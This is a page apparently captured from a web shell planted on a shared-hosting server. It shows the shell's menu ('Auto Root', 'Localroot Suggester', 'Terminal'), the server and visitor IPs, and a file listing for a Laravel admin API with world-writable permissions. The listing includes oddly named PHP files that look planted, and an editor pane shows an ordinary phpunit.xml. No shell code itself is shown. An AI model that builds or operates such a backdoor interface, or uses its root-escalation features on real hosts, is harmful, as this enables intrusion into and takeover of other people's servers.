Linux premium61.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
Server IP : 185.61.154.53 & Your IP : 216.73.216.73
Domains :
Cant Read [ /etc/named.conf ]
User : vdeshvpx
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
vdeshvpx /
adminapi.linkcrow.com /
Delete
Unzip
Name
Size
Permission
Date
Action
app
[ DIR ]
drwxrwxrwx
2026-04-08 06:50
bootstrap
[ DIR ]
drwxrwxrwx
2026-04-08 06:50
cgi-bin
[ DIR ]
drwxr-xr-x
2026-04-08 06:50
config
[ DIR ]
drwxrwxrwx
2026-04-08 06:50
database
[ DIR ]
drwxrwxrwx
2026-04-08 06:50
public
[ DIR ]
drwxr-x---
2026-04-08 06:50
resources
[ DIR ]
drwxrwxrwx
2026-04-08 06:50
routes
[ DIR ]
drwxrwxrwx
2026-04-08 06:50
storage
[ DIR ]
drwxrwxrwx
2026-04-08 06:50
tests
[ DIR ]
drwxrwxrwx
2026-04-08 06:50
vendor
[ DIR ]
drwxrwxrwx
2026-04-08 06:50
.DS_Store
8
KB
-rwxrwxrwx
2024-06-30 18:36
.editorconfig
235
B
-rwxrwxrwx
2024-06-30 18:36
.env
1.03
KB
-rwxrwxrwx
2025-09-28 15:51
.env.example
824
B
-rwxrwxrwx
2024-06-30 18:36
.gitattributes
116
B
-rwxrwxrwx
2024-06-30 18:36
.gitignore
175
B
-rwxrwxrwx
2024-06-30 18:36
.htaccess
197
B
-r--r--r--
2026-04-08 06:51
.styleci.yml
187
B
-rwxrwxrwx
2024-06-30 18:36
README.md
3.71
KB
-rwxrwxrwx
2024-06-30 18:36
adminapi(14-11-25).zip
21.15
MB
-rw-r--r--
2025-11-14 06:03
app.zip
42.79
MB
-rw-r--r--
2026-03-01 02:09
artisan
1.7
KB
-rwxrwxrwx
2024-06-30 18:36
composer.json
1.94
KB
-rwxrwxrwx
2024-11-02 06:20
composer.lock
319.91
KB
-rwxrwxrwx
2024-11-02 06:20
current.php
22
B
-rw-r--r--
2026-04-01 01:39
package.json
993
B
-rwxrwxrwx
2024-06-30 18:36
phpunit.xml
1.2
KB
-rwxrwxrwx
2024-06-30 18:36
server.php
584
B
-rwxrwxrwx
2024-06-30 18:36
txets.php
6.17
KB
-r--r--r--
2026-04-06 10:48
webpack.mix.js
576
B
-rwxrwxrwx
2024-06-30 18:36
wp-blog-header.php
2.74
KB
-rw-r--r--
2026-04-08 06:50
wp-cron.php
2.74
KB
-rw-r--r--
2026-04-08 06:50
Save
Rename
<?xml version="1.0" encoding="UTF-8"?> <phpunit xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="./vendor/phpunit/phpunit/phpunit.xsd" bootstrap="vendor/autoload.php" colors="true" > <testsuites> <testsuite name="Unit"> <directory suffix="Test.php">./tests/Unit</directory> </testsuite> <testsuite name="Feature"> <directory suffix="Test.php">./tests/Feature</directory> </testsuite> </testsuites> <coverage processUncoveredFiles="true"> <include> <directory suffix=".php">./app</directory> </include> </coverage> <php> <server name="APP_ENV" value="testing"/> <server name="BCRYPT_ROUNDS" value="4"/> <server name="CACHE_DRIVER" value="array"/> <!-- <server name="DB_CONNECTION" value="sqlite"/> --> <!-- <server name="DB_DATABASE" value=":memory:"/> --> <server name="MAIL_MAILER" value="array"/> <server name="QUEUE_CONNECTION" value="sync"/> <server name="SESSION_DRIVER" value="array"/> <server name="TELESCOPE_ENABLED" value="false"/> </php> </phpunit>